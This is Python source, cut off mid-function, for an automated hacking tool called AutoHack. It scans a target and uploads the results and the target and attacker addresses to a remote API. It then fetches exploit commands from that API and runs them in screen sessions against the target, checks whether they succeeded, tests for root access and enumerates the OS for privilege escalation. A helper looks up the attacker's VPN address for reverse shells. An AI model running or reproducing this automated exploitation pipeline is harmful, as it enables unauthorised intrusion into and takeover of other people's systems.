#!python
import os
import re
import site
import subprocess as sp
import time
import shlex
import argparse
import uuid

import requests
from glob import glob
from dataclasses import dataclass
from multiprocessing import Lock
from multiprocessing import Process
from multiprocessing import current_process
from subprocess import Popen, PIPE
from threading import Thread
from typing import List, Dict, Union, Callable, Any

import toml
from bs4 import BeautifulSoup


class Colors:
    BLUE = '\033[34m'
    CYAN = '\033[96m'
    GREEN = '\033[92m'
    MAGENTA = '\033[95m'
    RED = '\033[91m'
    END = '\033[0m'
    BOLD = '\033[1m'


class SuccessStatus:
    EXPLOIT_NETWORK_UNSUCCESSFUL = 'EXPLOIT_NETWORK_UNSUCCESSFUL'
    EXPLOIT_NETWORK_SUCCESSFUL = 'EXPLOIT_NETWORK_SUCCESSFUL'
    EXPLOIT_OS_UNSUCCESSFUL = 'EXPLOIT_OS_UNSUCCESSFUL'
    EXPLOIT_OS_SUCCESSFUL = 'EXPLOIT_OS_SUCCESSFUL'


class Utils:
    class AutoHackException(Exception):
        pass

    @staticmethod
    def make_directories(*args: str) -> None:
        """
        Makes a directory for each directory
        :param args:
        :return:
        """
        for directory in args:
            if os.path.isdir(directory):
                continue
            os.makedirs(directory)

    @staticmethod
    def clear_file(_file: str) -> None:
        """
        Clear file by writing an empty string into it
        :param _file:
        :return:
        """
        with open(_file, 'w') as f:
            f.write('')

    @staticmethod
    def print_time() -> None:
        current_time_in_seconds = int(time.time())
        print(f"{Colors.MAGENTA}{Colors.BOLD}CURRENT TIME{Colors.END}: {current_time_in_seconds}")

    @staticmethod
    def determine_output_file(
            command: str,
            options_associated_with_output_file: List[str]
    ) -> Union[str, None]:
        """
        Parses command for output file and returns...
            (1) the output file if determined
                        or
            (2) None, if output file can not be determined
        :param command:
        :param options_associated_with_output_file:
        :return:
        """
        fragments = shlex.split(command)
        filepath = None

        for index, fragment in enumerate(fragments):
            if fragment.lower() in options_associated_with_output_file:
                if index + 1 >= len(fragments):
                    continue

                filepath = fragments[index + 1]
                return filepath
        return filepath

    @staticmethod
    def should_run_command(command_output_file: str) -> bool:
        """
        Should run command if:
            (1) the output file is None
                            or
            (2) the command's output file doesn't exist
        :param command_output_file:
        :return: a boolean value
        """
        if command_output_file is None:
            return True

        return not os.path.isfile(command_output_file)

    @staticmethod
    def extract_matching_string(regex: str, text: str) -> Union[str, None]:
        """
        Extracts the string which matches regex within a text
        :param regex:
        :param text:
        :return:
        """
        match = re.search(regex, text.lower())
        if match:
            return match.string
        else:
            return None

    @staticmethod
    def alpha_to_int(text) -> Union[int, str]:
        """
        Casts alpha-numeric to an integer
        :param text:
        :return:
        """
        if text.isdigit():
            return int(text)
        return text

    @staticmethod
    def natural_keys(text: str) -> List[str]:
        """
        Split text into fragments so it can be naturally sorted.
        :param text:
        :return:
        """
        return [Utils.alpha_to_int(c) for c in re.split('(\\d+)', text)]

    @staticmethod
    def get_site_packages() -> List[str]:
        return site.getsitepackages()

    @staticmethod
    def get_lock():
        """
        Returns the processing lock
        :return:
        """
        return Lock()

    @staticmethod
    def process_safe_print(_str: str) -> None:
        """
        Locks process, prints, and releases process
        so that printing output appears in the correct order
        :param _str:
        :return:
        """
        process_lock = Utils.get_lock()
        process_lock.acquire()
        print(_str)
        process_lock.release()

    @staticmethod
    def get_chart(value, max_value, size=30, unit='seconds') -> str:
        """
        Renders chart based on input values

        :param value:
        :param max_value:
        :param size:
        :param unit:
        :return:
        """
        if value > max_value:
            value = max_value
        elif value < 0:
            value = 0

        scaled_value = int(value / max_value * size)
        tick_marks = '▯' * scaled_value
        non_tick_marks = ' ' * (size - scaled_value)
        chart = (f'|{Colors.GREEN}{Colors.BOLD}{tick_marks}{Colors.END}'
                 f'{Colors.CYAN}({value} {unit}){Colors.END}'
                 f'{non_tick_marks}|{Colors.CYAN}({max_value} {unit}){Colors.END}')
        return chart

    @staticmethod
    def get_attacker_address(interface='tun0') -> str | None:
        """
        Gets ip address of attacker. This is used for
        obtaining a reverse shell.

        By default, it uses the tun0 network interface since the attacker
        is likely connected to the target through a vpn.

        :param interface:
        :return:
        """
        try:
            result = sp.check_output(
                ['ip', '-4', 'addr', 'show', interface],
                stderr=sp.STDOUT
            )
            result = result.decode().splitlines()
            ipaddr = [line.split()[1].split('/')[0] for line in result if "inet" in line]
            return ipaddr[0]

        except (Exception,):
            return None


@dataclass
class ProcessReference:
    """keeps track of useful process data."""
    target: Callable
    args: List[Any]
    kill_after_time: int
    process_object: Process
    retry_max: int
    command_pids: List[str]

    def has_timed_out(self) -> bool:
        current_time_in_seconds = int(time.time())
        return current_time_in_seconds >= self.kill_after_time

    @property
    def should_retry(self):
        return self.retry_max > 0

    @property
    def command(self):
        try:
            return self.args[0]
        except IndexError:
            raise Utils.AutoHackException(
                f'Process {self.process_object.pid} Does Not Have Any Arguments Recorded'
            )

    def decrement_retry_max(self):
        self.retry_max -= 1

    def append_pid(self, pid: str):
        """
        Keeping track of this command's pids is useful when debugging
        :param pid:
        :return:
        """
        self.command_pids.append(pid)


class ProcessManager:
    def __init__(
            self,
            verbose: bool,
            time_between_heart_beats: int,
    ):
        self.processes: List[ProcessReference] = []
        self.verbose = verbose
        self.time_between_heart_beats = time_between_heart_beats
        self.heart_beat_process = Thread(
            target=self.heart_beat,
        )

    def wait_until_pending_processes_have_completed(self):
        """
        This ensures, that we don't move on to the next step until
        all preexisting processes have completed.
        :return:
        """
        half_time_between_heart_beats = self.time_between_heart_beats / 2
        while True:
            if len(self.processes) == 0:
                break
            time.sleep(half_time_between_heart_beats)

        print('\nPending Processes Have Completed. Moving To Next Step\n')

    def append_process(self, process: ProcessReference) -> None:
        self.processes.append(process)

    def print_active_processes_data(self, active_process: List[ProcessReference]) -> None:
        current_time = int(time.time())

        message = f'\n{Colors.MAGENTA}{Colors.BOLD}COMMANDS STILL RUNNING [at {current_time}]:{Colors.END}\n'
        for process in active_process:
            seconds_until_timeout = int(process.kill_after_time - current_time)

            message += f'\t{Colors.CYAN}{Colors.BOLD}PID:{Colors.END} {process.process_object.pid}\n'
            chart = Utils.get_chart(
                value=seconds_until_timeout,
                max_value=AutoHack.command_timeout
            )
            message += f'\t{Colors.CYAN}{Colors.BOLD}SECONDS UNTIL TIMEOUT:{Colors.END} {chart}\n'

            if self.verbose:
                message += f'\t{Colors.CYAN}{Colors.BOLD}COMMAND CALLED:{Colors.END} {process.command}\n'

            # add spaces between each process message
            message += '\n'

        Utils.process_safe_print(message)

    @staticmethod
    def retry_process(process: ProcessReference):
        """
        * Creates a new process using the preexisting target and args.
        * Updates attributes of process reference

        :param process:
        :return:
        """

        # create new process using preexisting
        pr = Process(target=process.target, args=process.args)
        pr.start()

        # update process reference attributes
        process.process_object = pr
        process.append_pid(str(pr.pid))
        process.kill_after_time = int(time.time()) + AutoHack.command_timeout
        process.decrement_retry_max()

    def terminate_all_active_processes(self, show_message: bool = True) -> None:
        for process in self.processes:

            if not process.process_object.is_alive():
                continue

            if process.has_timed_out():
                continue

            process.process_object.terminate()

            if not show_message:
                continue

            message = (f'\n{Colors.RED}{Colors.BOLD}KILLING PROCESS, PROGRAM ENDING: '
                       f'PID:{process.process_object.pid}{Colors.END}')
            Utils.process_safe_print(message)

    def heart_beat(self) -> None:
        while True:
            time.sleep(self.time_between_heart_beats)
            active_processes = []

            for process in self.processes:

                # skip non-active processes
                if not process.process_object.is_alive():
                    continue

                if process.has_timed_out():
                    process.process_object.terminate()
                    message = (f'\n{Colors.RED}{Colors.BOLD}KILLING PROCESS DUE TO TIMEOUT: '
                               f'PID:{process.process_object.pid}{Colors.END}')
                    Utils.process_safe_print(message)

                    if not process.should_retry:
                        continue

                    self.retry_process(process)
                    command_pids = '->'.join(process.command_pids)
                    message = (
                        f'{Colors.MAGENTA}{Colors.BOLD}COMMAND RESTARTED:{Colors.END} '
                        f'{Colors.CYAN}{Colors.BOLD}COMMAND PIDS:{Colors.END}'
                        f'{Colors.GREEN}{Colors.BOLD}{command_pids}{Colors.END}\n'
                    )
                    Utils.process_safe_print(message)

                active_processes.append(process)

            if AutoHack.should_kill_heart_beat:
                self.terminate_all_active_processes()
                break

            if active_processes:
                self.print_active_processes_data(active_processes)
            else:
                # when there are no active processes, reset processes
                self.processes = []

    def run(self):
        self.heart_beat_process.start()


class AutoHack:
    should_kill_heart_beat = False
    command_timeout = 0
    api_source = os.getenv('AUTOHACK_API_SOURCE') or 'https://api.autohack.com'
    api_key = os.getenv('AUTOHACK_API_KEY') or 'FREE'

    def __init__(
            self, ip_address, attacker_ip_address, output_directory=None, config_directory=None,
            port_scan_type=None, nmap_extra=None, ports=None,
            use_processes=None, verbose=None, command_timeout=None,
            heart_beat_time=None, retry_max=None, professional=None
    ) -> None:
        AutoHack.command_timeout = command_timeout
        self.process_lock = Utils.get_lock()
        self.target_address = ip_address
        self.attacker_address = attacker_ip_address
        self.port_scan_type = port_scan_type
        self.nmap_extra = nmap_extra
        self.ports = ports
        self.current_working_directory = os.getcwd()
        self.use_processes = use_processes
        self.verbose = verbose
        self.retry_max = retry_max
        self.professional = professional
        self.process_manager = ProcessManager(
            verbose=verbose,
            time_between_heart_beats=heart_beat_time,
        )
        if use_processes:
            self.process_manager.run()

        output_directory = output_directory or os.path.join(
            self.current_working_directory,
            'results', self.target_address
        )
        config_directory = self.get_config(config_directory)
        port_scan_config_file = os.path.join(config_directory, 'port-scans.toml')
        services_scan_config_file = os.path.join(config_directory, 'service-scans.toml')
        universal_pattern_config_file = os.path.join(config_directory, 'universal-patterns.toml')
        os_discovery_config_file = os.path.join(config_directory, 'os-discovery.toml')

        if not os.path.isfile(port_scan_config_file):
            raise Utils.AutoHackException(f'Can Not Find Port Scan Config File inside: {config_directory} Directory')
        if not os.path.isfile(services_scan_config_file):
            raise Utils.AutoHackException(f'Can Not Find Services Scan Config File: {config_directory} Directory')
        if not os.path.isfile(universal_pattern_config_file):
            raise Utils.AutoHackException(f'Can Not Find Universal Pattern Config File: {config_directory} Directory')
        if not os.path.isfile(os_discovery_config_file):
            raise Utils.AutoHackException(f'Can Not Find Os Discovery Config File: {config_directory} Directory')

        self.port_scan_config = toml.load(port_scan_config_file)
        self.services_scan_config = toml.load(services_scan_config_file)
        self.universal_patterns = [value for value in toml.load(universal_pattern_config_file).values()]
        self.os_discovery_config = toml.load(os_discovery_config_file)

        self.scan_directory = os.path.join(output_directory, 'scans')
        xml_directory = os.path.join(self.scan_directory, 'xml')
        log_directory = os.path.join(self.scan_directory, 'logs')
        self.exploit_directory = os.path.join(output_directory, 'exploit')
        self.exploit_commands_attempted_directory = os.path.join(self.exploit_directory, 'commands_attempted')
        self.priv_directory = os.path.join(output_directory, 'priv')
        loot_directory = os.path.join(output_directory, 'loot')
        Utils.make_directories(
            self.scan_directory, xml_directory, log_directory,
            self.exploit_directory, self.priv_directory, loot_directory,
            self.exploit_commands_attempted_directory
        )

        self.detected_services = set()
        self.pattern_matches = dict()
        self.exploit_scans = set()
        self.commands_run_log = os.path.join(log_directory, 'commands.log')
        self.detected_services_log = os.path.join(log_directory, 'detected_services.log')
        self.exploit_steps_log = os.path.join(log_directory, 'exploit_steps.log')
        self.patterns_detected_log = os.path.join(log_directory, 'patterns.log')
        self.session_id: str | None = None
        self.spearhead_index_unique_id: str | None = None
        self.expected_command_answers_to_verify_root_access: dict = {}
        self.success_status = SuccessStatus.EXPLOIT_NETWORK_UNSUCCESSFUL
        Utils.clear_file(self.exploit_steps_log)

    def get_config(self, config_directory: str):
        """
        The config directory is needed for enumeration.
        This method checks for the config directory in all the
        expected places. If it cannot be found, it raises an exception

        :param config_directory:
        :return:
        """
        # use user-specified AutoHack config directory
        if config_directory:
            return config_directory

        # define <current-working-directory>/autohack_config
        local_config_directory = os.path.join(
            self.current_working_directory, 'autohack_config'
        )

        # define ~/.config/autohack_config
        home_directory = os.path.expanduser("~")
        global_config_directory = os.path.join(
            home_directory, '.config', 'autohack_config'
        )

        # define <possible site-packages>/autohack_config
        site_packages = Utils.get_site_packages()
        site_packages_autohack_directories = [
            f'{site_package_directory}/autohack_config' for site_package_directory in site_packages
        ]

        possible_config_directories_locations = [
                                                    local_config_directory,
                                                    global_config_directory
                                                ] + site_packages_autohack_directories

        for prospective_directory in possible_config_directories_locations:
            if self.verbose:
                print(f'{Colors.GREEN}Looking For AutoHack Config In: {prospective_directory}{Colors.END}')

            if os.path.exists(prospective_directory):
                if self.verbose:
                    print(f'{Colors.GREEN}Found AutoHack Config In: {prospective_directory}{Colors.END}\n\n')
                return prospective_directory

        # raise exception when config directory couldn't be found
        raise Utils.AutoHackException('Can Not Find Config Directory')

    def print(self, _str: str) -> None:
        """
        Locks process, prints, and releases process
        so that printing output appears in the correct order
        :param _str:
        :return:
        """
        self.process_lock.acquire()
        print(_str)
        self.process_lock.release()

    def process_print(self, _str: str) -> None:
        """
        Prints while prepending the process id
        so it's more obvious where message came from
        :param _str:
        :return:
        """
        if self.use_processes:
            process_id = current_process().pid
            _str = f"{Colors.CYAN}{Colors.BOLD}Process {process_id}:{Colors.END} {_str}"
        self.print(_str)

    def command_has_been_run(self, command) -> bool:
        try:
            f = open(self.commands_run_log, "r")
            all_commands_run = f.read()
            return command in all_commands_run
        except FileNotFoundError:
            return False

    def log_command(self, command: str) -> None:
        """
        Writes command to a log file
        :param command:
        :return:
        """
        process_id = current_process().pid
        command = f"[*] (Process {process_id}) {command}\n\n"
        self.process_lock.acquire()
        with open(self.commands_run_log, 'a') as f:
            f.write(command)
        self.process_lock.release()

    def log_detected_services(self) -> None:
        """
        Write the detected services to a log file
        :return:
        """
        detected_services_list = list(self.detected_services)
        detected_services_list.sort(key=Utils.natural_keys)

        with open(self.detected_services_log, 'w') as f:
            self.process_lock.acquire()
            for detected_service in detected_services_list:
                f.write(f"{detected_service}\n")
            self.process_lock.release()

    def log_exploit_steps(self, exploit_scans: List[Dict], service_scan_data: Dict) -> None:
        """
        Writes exploit scans to a log file
        :param exploit_scans:
        :param service_scan_data:
        :return:
        """
        with open(self.exploit_steps_log, 'a') as f:
            self.process_lock.acquire()
            for sub_scan in exploit_scans:
                message = f"[*] {sub_scan['description']}\n"
                wrote_command = False

                for command in sub_scan['commands']:
                    command = command.format(**service_scan_data)
                    if command in self.exploit_scans:
                        continue
                    wrote_command = True
                    self.exploit_scans.add(command)
                    message += f"\t{command}\n"
                if wrote_command:
                    f.write(f"{message}\n\n")
            self.process_lock.release()

    def record_pattern_matches(self, output_file: str, patterns: List[dict], service_data: dict) -> None:
        """
        Checks output file for certain regex patterns
        and then saves pattern description for future analysis.

        :param output_file:
        :param patterns:
        :param service_data:
        :return:
        """
        if 'port' in service_data:
            # since port scans don't specify a port, don't look at universal
            # patterns for port scans
            patterns_to_search = patterns + self.universal_patterns
        else:
            patterns_to_search = patterns

        if len(patterns_to_search) == 0:
            return

        with open(output_file, 'r') as f:
            for line in f:
                for pattern in patterns_to_search:
                    description = pattern['description']
                    pattern_regex = pattern['pattern'].lower()
                    match = Utils.extract_matching_string(pattern_regex, line)
                    if match:
                        description = description.format(**service_data, match=match)
                        if output_file in self.pattern_matches:
                            self.pattern_matches[output_file].add(description)
                        else:
                            self.pattern_matches[output_file] = {description}
        self.log_recorded_patterns()

    def log_recorded_patterns(self) -> None:
        """
        Records patterns which were saved
        :return:
        """
        if len(self.pattern_matches) == 0:
            return

        pattern_description_shown = set()

        self.process_lock.acquire()
        with open(self.patterns_detected_log, 'w') as f:
            for output_file in self.pattern_matches:
                unrepeated_pattern_present = False
                message = f"[*] Pattern/s detected in: '{output_file}'\n"
                for description in self.pattern_matches[output_file]:
                    if description in pattern_description_shown:
                        continue
                    pattern_description_shown.add(description)
                    message += f"\t[-] {description}\n"
                    unrepeated_pattern_present = True
                message += "\n"

                if unrepeated_pattern_present:
                    f.write(message)
        self.process_lock.release()

    def run_command(self, command: str, should_log=True) -> None:
        """
        Executes a command
        :param command:
        :param should_log:
        :return:
        """
        if should_log:
            self.log_command(command)

        process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
        _, __ = process.communicate()

    def record_process_reference(self, target, arguments, pr):
        """
        Stores a reference to a process so we can keep
        track of its progress

        :param target: the function being called
        :param arguments: the arguments function is being called with
        :param pr: process object
        :return:
        """
        kill_after_time = int(time.time()) + self.command_timeout

        process_reference = ProcessReference(
            target=target,
            args=arguments,
            kill_after_time=kill_after_time,
            process_object=pr,
            retry_max=self.retry_max,
            command_pids=[str(pr.pid)]
        )
        self.process_manager.append_process(process_reference)

    def wait_for_all_processes(self):
        """
        This blocks execution until all the spawned processes and threads have completed
        :return:
        """
        if not self.use_processes:
            # if processes are not being used,
            # this can be skipped
            return

        for pr in self.process_manager.processes:
            pr.process_object.join()

        # let heart beat thread complete after process
        self.process_manager.heart_beat_process.join()
        print('\n\n')
        Utils.print_time()

    def execute_secondary_enumerate_command(
            self, command: str,
            service_data: dict,
            patterns: List[dict]
    ) -> None:
        """
        Executes command for secondary enumeration
        on text-based file outputs

        :param command:
        :param service_data:
        :param patterns:
        :return:
        """
        command = command.format(**service_data)
        if self.command_has_been_run(command):
            return

        text_file_related_parameters = ['-on', 'tee', '-o', '--simple-report']
        output_file = Utils.determine_output_file(command, text_file_related_parameters)
        if Utils.should_run_command(output_file):
            time_before_command = int(time.time())
            command_printed = (
                f"SECONDARY ENUMERATE: [at {time_before_command}]\n"
                f"\t{Colors.GREEN}{command}{Colors.END}"
            )
            self.process_print(command_printed)
            self.run_command(command)
            time_after_command = int(time.time())
            self.process_print(
                f"{Colors.MAGENTA}{Colors.BOLD}Command Completed{Colors.END} "
                f"[at {time_after_command}]\n"
            )

        if output_file is None:
            return

        self.record_pattern_matches(output_file, patterns, service_data)

    def execute_primary_enumerate_command(
            self, command: str,
            service_data: dict,
    ) -> None:
        """
        Executes command for primary enumeration
        on xml-based file outputs

        :param command:
        :param service_data:
        :return:
        """
        command = command.format(**service_data)
        if self.command_has_been_run(command):
            return

        xml_file_related_parameters = ['-ox']
        output_file = Utils.determine_output_file(command, xml_file_related_parameters)
        if Utils.should_run_command(output_file):
            time_before_command = int(time.time())
            command_printed = (
                f"{Colors.BLUE}{Colors.BOLD}PRIMARY ENUMERATE:{Colors.END} "
                f"[at {time_before_command}]\n\t{Colors.GREEN}{command}{Colors.END}"
            )
            self.process_print(command_printed)
            self.run_command(command)
            time_after_command = int(time.time())
            self.process_print(
                f"{Colors.MAGENTA}{Colors.BOLD}Primary Command Completed{Colors.END} "
                f"[at {time_after_command}]\n"
            )

        if output_file is None:
            return

        self.secondary_enumerate(output_file)

    def secondary_enumerate(self, xml_output_file: str) -> None:
        """
        Does secondary enumeration based on sub-scans in
        the service-scans.toml in config folder and xml-output files
        :param xml_output_file::
        :return:
        """
        if xml_output_file is None:
            return

        infile = open(xml_output_file, "r")
        contents = infile.read()
        soup = BeautifulSoup(contents, 'xml')
        ports = soup.find_all('port')

        for port in ports:
            state = port.find('state')
            if state['state'] == 'closed':
                continue

            service = port.find('service')
            if service is None:
                continue

            service_scan_data = {
                'nmap_extra': self.nmap_extra,
                'scandir': self.scan_directory,
                'target_address': self.target_address,
                'port': port['portid'],
                'protocol': port['protocol'],
                'name': service['name'],
                'username_wordlist': self.services_scan_config['username_wordlist'],
                'password_wordlist': self.services_scan_config['password_wordlist'],
                'secure': True if 'ssl' in service or 'tls' in service else False,
                'scheme': 'https' if 'https' in service or 'ssl' in service or 'tls' in service else 'http'
            }

            self.detected_services.add(
                f"[*] {port['portid']}/{port['protocol']}: {service['name']}    ({state['state']})"
            )
            for service_name, scan in self.services_scan_config.items():
                if type(scan) is not dict:
                    continue
                scan_regex_combined = "(" + ")|(".join(scan['service-names']) + ")"
                match = Utils.extract_matching_string(scan_regex_combined, service['name'])
                if match is None:
                    continue

                if 'exploit' in scan:
                    self.log_exploit_steps(scan['exploit'], service_scan_data)

                if 'scan' not in scan:
                    continue

                for sub_scan in scan['scan']:
                    command = sub_scan['command']
                    patterns = sub_scan.get('pattern', [])
                    if self.use_processes:
                        target = self.execute_secondary_enumerate_command
                        arguments = (command, service_scan_data, patterns)

                        pr = Process(target=target, args=arguments)
                        pr.start()

                        self.record_process_reference(
                            target=target, arguments=arguments, pr=pr)
                    else:
                        self.execute_secondary_enumerate_command(
                            command, service_scan_data, patterns
                        )

            self.log_detected_services()

    def upload_enumeration_files(self):
        """
        Uploads enumeration file and receives the session_id from the api
        """
        xml_file_pattern = glob(f'{self.scan_directory}/xml/*.xml')
        text_file_pattern = glob(f'{self.scan_directory}/*.txt')
        files_to_upload = {}
        files_uploaded_without_extensions = set()

        for file_path in xml_file_pattern + text_file_pattern:
            file_name_with_extension = os.path.basename(file_path)
            file_path_without_extension = os.path.splitext(file_name_with_extension)[0]

            if file_path_without_extension in files_uploaded_without_extensions:
                continue

            files_uploaded_without_extensions.add(file_path_without_extension)
            files_to_upload[file_name_with_extension] = open(file_path, 'rb').read()

        url = f'{self.api_source}/analyze-enumerate-results'
        attacker_address = self.attacker_address or Utils.get_attacker_address()
        if attacker_address is None:
            raise Utils.AutoHackException('Attacker Address Must Be Defined')

        headers = {
            'API_KEY': self.api_key,
            'target_address': self.target_address,
            'attacker_address': self.attacker_address or Utils.get_attacker_address(),
            'scandir': self.scan_directory,
        }
        response = requests.post(url, files=files_to_upload, headers=headers)
        response_data = response.json()
        self.session_id = response_data['session_id']

    @staticmethod
    def get_screen_log_file(unique_screen_name: str):
        return f"/tmp/log_{unique_screen_name}.txt"

    def get_best_attack(self) -> dict:
        """
        Requests the current best attack from the Api
        """
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        url = f'{self.api_source}/get-best-attack'
        response = requests.post(url, headers=headers)
        response_data = response.json()
        return response_data

    def get_best_os_attack(self) -> dict:
        """
        Requests the current best attack from the Api
        """
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        url = f'{self.api_source}/get-best-os-attack'
        response = requests.post(url, headers=headers)
        response_data = response.json()
        return response_data

    def kill_preexisting_screens(self):
        """
        Kills all preexisting screens so they will
        not interfere with new screens
        :return:
        """
        command = 'pkill screen'
        self.run_command(command, False)

    def execute_attack(self, attack: dict):
        """
            Runs commands in attack via screen. Some commands
            may block subsequent commands.
        """
        commands = attack['attack_commands']['command_group']
        is_blocking = attack['attack_commands']['meta']['command_should_block']
        vul_name = attack['attack_commands']['vulnerability_name'].strip()
        spearhead_index = attack['attack_commands']['meta']['spearhead_index']

        print(f'\n{Colors.CYAN}RUNNING ATTACK COMMANDS FOR:{Colors.END} {vul_name}:\n')

        # stop the preexisting attack
        self.kill_preexisting_screens()

        for index, command in enumerate(commands):
            unique_screen_name = str(uuid.uuid4())
            if spearhead_index == index:
                self.spearhead_index_unique_id = unique_screen_name

            command_file_path = os.path.join(
                self.exploit_commands_attempted_directory,
                f'{unique_screen_name}.txt'
            )
            with open(command_file_path, "w") as file:
                file.write(command)

            log_file_path = self.get_screen_log_file(unique_screen_name)
            screen_command = (
                f'screen -dmS {unique_screen_name} '
                f'-L -Logfile "{log_file_path}" '
                f'bash -c "$(cat {command_file_path})"'
            )

            target = self.run_command
            arguments = (screen_command, False)

            time_before_command = int(time.time())
            command_printed = (
                f"\tEXPLOIT COMMAND-{index} [at {time_before_command}]\n"
                f"\t\t{Colors.GREEN}{command}{Colors.END}\n"
            )
            print(command_printed)

            p = Process(target=target, args=arguments)
            p.start()
            p.join()

            if is_blocking[index]:
                # wait for screen command to finish
                blocking_command = f"tail --pid=$(pgrep -f {unique_screen_name}) -f /dev/null"
                self.run_command(blocking_command, False)

            # remove command file to clean up directory
            os.remove(command_file_path)

    def execute_os_attack(self, attack: dict):
        """
            Runs commands in attack via screen. Some commands
            may block subsequent commands.
        """
        vul_name = attack['vulnerability_name'].strip()
        commands = attack['exploit_commands'].get('commands', [])
        command_keys = attack['exploit_commands'].get('keys', [])
        delay_seconds_between_commands = .5

        print(f'{Colors.CYAN}RUNNING OS ATTACK COMMANDS FOR:{Colors.END} {vul_name}:\n')

        for index in range(len(commands)):
            command = commands[index]
            key = command_keys[index]

            tmp_command_file_path = '/tmp/execute_os_path_tmp_file.txt'
            with open(tmp_command_file_path, "w") as file:
                file.write(command)

            time_before_command = int(time.time())
            command_printed = (
                f"\tOS EXPLOIT COMMAND-{index} [at {time_before_command}]\n"
                f"\t\t{Colors.GREEN}{command}{Colors.END}\n"
            )
            print(command_printed)

            if key == 'spearhead':
                screen_command = (
                    f'screen -S {self.spearhead_index_unique_id} -X stuff "$(cat {tmp_command_file_path})\n"'
                )
                self.run_command(screen_command, False)

                # delay so command will run
                time.sleep(delay_seconds_between_commands)

    def attack_is_successful(self, delay_seconds: int = 10) -> bool:
        """
            Examines main attack screen output to see if attack was successful.
            * Creates file with screen contents
            * Grabs file contents
            * Sends file to server
        """
        message = f"\t{Colors.MAGENTA}VERIFYING ATTACK SUCCESS{Colors.END} [at {int(time.time())}]"
        print(message)

        # slow execution to ensure attack ran
        time.sleep(delay_seconds)

        output_file_path = os.path.join(self.exploit_directory, f'{self.spearhead_index_unique_id}.txt')
        grab_screen_command = f"screen -r {self.spearhead_index_unique_id} -X hardcopy {output_file_path}"

        # create file with contents
        self.run_command(grab_screen_command, False)

        main_screen_output = open(output_file_path, 'r').read()

        url = f'{self.api_source}/verify-best-attack-success'
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        response = requests.post(url, json=main_screen_output, headers=headers)
        response_data = response.json()

        return response_data['is_successful']

    def attack_repeatedly(self):
        """
        Repeatedly
            Gets the best attack based on the previous enumeration output
            and then implements attack until all attacks have been exhausted
        """
        self.upload_enumeration_files()

        while True:
            best_attack = self.get_best_attack()
            if not best_attack['should_continue']:
                self.should_kill_heart_beat = True
                print('\n\nNo Exploit Discovered')
                break

            self.execute_attack(best_attack)
            if self.attack_is_successful():
                message = f"\t{Colors.GREEN}{Colors.BOLD}ATTACK SUCCESSFUL{Colors.END} [at {int(time.time())}]\n"
                print(message)
                self.success_status = SuccessStatus.EXPLOIT_NETWORK_SUCCESSFUL
                break

    def get_is_user_root_commands(self) -> dict:
        """
        Requests commands and expected answers
        that verify root access
        """
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        url = f'{self.api_source}/get-is-user-root-commands'
        response = requests.post(url, headers=headers)
        response_data = response.json()
        return response_data

    def user_is_root(self) -> bool:
        for key_command in self.expected_command_answers_to_verify_root_access:
            """
                * Runs verification command on spearhead terminal session
                * Runs grab screen session command
                * Examines the output for expected command answers
            """
            data = self.expected_command_answers_to_verify_root_access[key_command]
            expected_output_when_root = data['answer']
            command_wait_time_in_seconds = data['wait']

            tmp_command_file_path = '/tmp/user_is_root.txt'
            self.run_command_and_grab_new_content(
                screen_index=self.spearhead_index_unique_id,
                command=key_command,
                output_file_path=tmp_command_file_path,
                screen_log_update_seconds=command_wait_time_in_seconds,
            )

            output_produced_by_command = open(tmp_command_file_path, 'r').read()

            if expected_output_when_root in output_produced_by_command:
                self.success_status = SuccessStatus.EXPLOIT_OS_SUCCESSFUL
                return True

        return False

    @staticmethod
    def print_user_is_root_successful():
        message = (
            f'\t{Colors.GREEN}{Colors.BOLD}ROOT ACCESS SUCCESSFUL{Colors.END}'
        )
        print(message)

    @staticmethod
    def print_user_is_root_unsuccessful():
        message = (
            f'\t{Colors.RED}{Colors.BOLD}ROOT ACCESS UNSUCCESSFUL{Colors.END}'
        )
        print(message)

    def check_if_user_is_already_root(self) -> bool:
        """
        Checks if the user has already been root and
        prints a message for feedback
        :return:
        """
        message = (
            f'\n\n'
            f'{Colors.CYAN}VERIFYING ROOT ACCESS:{Colors.END}'
        )
        print(message)

        if self.user_is_root():
            self.print_user_is_root_successful()
            return True
        else:
            self.print_user_is_root_unsuccessful()

        return False

    def run_command_and_grab_new_content(
            self,
            screen_index: str,
            command: str,
            output_file_path: str,
            screen_log_update_seconds: int = 15,
    ):
        """
        * Grabs current screen content and determines its length
        * Runs command
        * Grabs the screen content after length
        :return:
        """

        # get log file size
        screen_log_file_path = self.get_screen_log_file(screen_index)
        file_size_before_command_of_interest = os.path.getsize(screen_log_file_path)

        # run the command of interest
        command_on_screen = f'screen -r {screen_index} -X stuff "{command}\n"'
        self.run_command(command_on_screen, False)
        time.sleep(screen_log_update_seconds)

        # read new content from the old starting point
        screen_log_file_handle = open(screen_log_file_path, 'r')
        screen_log_file_handle.seek(file_size_before_command_of_interest)
        content_produced_by_command = screen_log_file_handle.read().rstrip()

        # save new content
        with open(output_file_path, "w") as file:
            file.write(content_produced_by_command)

    def determine_primary_os_enumeration(self) -> dict:
        """
        Determines the OS, useful available programs, and uses that to determine primary enumeration commands
        :return:
        """
        print(f"\n\t{Colors.MAGENTA}DETECTING OPERATING SYSTEM{Colors.END} [at {int(time.time())}]")
        files_to_upload = {}

        for s in self.os_discovery_config:
            for assay in self.os_discovery_config[s]['assay']:
                command = assay['command']
                file_name = assay['file_name']
                output_file_path = os.path.join(self.priv_directory, file_name)

                self.run_command_and_grab_new_content(
                    self.spearhead_index_unique_id,
                    command,
                    output_file_path
                )
                file_name_with_extension = os.path.basename(output_file_path)
                files_to_upload[file_name_with_extension] = open(output_file_path, 'rb').read()

        url = f'{self.api_source}/determine-primary-os-enumeration'
        headers = {
            'API_KEY': self.api_key,
            'session_id': self.session_id,
        }
        response = requests.post(url, files=files_to_upload, headers=headers)
        response_data = response.json()

        detected_os = response_data['os'].title()
        print(f"\n\t{Colors.MAGENTA}OPERATING SYSTEM DETECTED{Colors.END}: {detected_os} \n\n")

        return response_data

    def run_primary_os_enumeration(self, os_enumeration_commands: dict) -> dict:
        """
        * Does primary Os enumeration,
        * Uploads the result for analysis
        * Gets Secondary OS enumeration commands
        :return:
        """
        primary_os_enumeration_command = os_enumeration_commands['command']
        primary_os_enumeration_output_file = os.path.join(
